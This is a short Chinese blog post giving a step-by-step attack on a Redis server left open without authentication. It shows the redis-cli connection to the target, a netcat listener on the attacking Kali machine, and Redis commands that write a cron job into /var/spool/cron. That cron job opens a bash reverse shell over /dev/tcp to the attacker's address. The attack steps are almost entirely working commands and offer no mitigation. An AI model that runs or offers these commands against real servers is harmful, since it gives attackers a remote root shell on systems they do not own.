Redis未授权访问反弹shell

时间：2018-05-03 18:03:57 阅读：154 评论：0 收藏：0 [点我收藏+]

Redis未授权访问反弹shell

目标主机：10.104.11.178

攻击机：kali

攻击步骤：

1.与目标主机连接

root@kali:~# /usr/redis/redis-cli -h 10.104.11.178

2.kali主机进行监听

nc -l -v  -p 9999

技术分享图片

3.写入反弹shell语句

set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/10.104.11.153/9999 0>&1\n\n"
config set dir /var/spool/cron
config set dbfilename root
save

技术分享图片

4.反弹shell连接成功

技术分享图片

原文：https://www.cnblogs.com/someone9/p/8986502.html

踩

(0)

评论一句话评论（0）

分享档案

更多>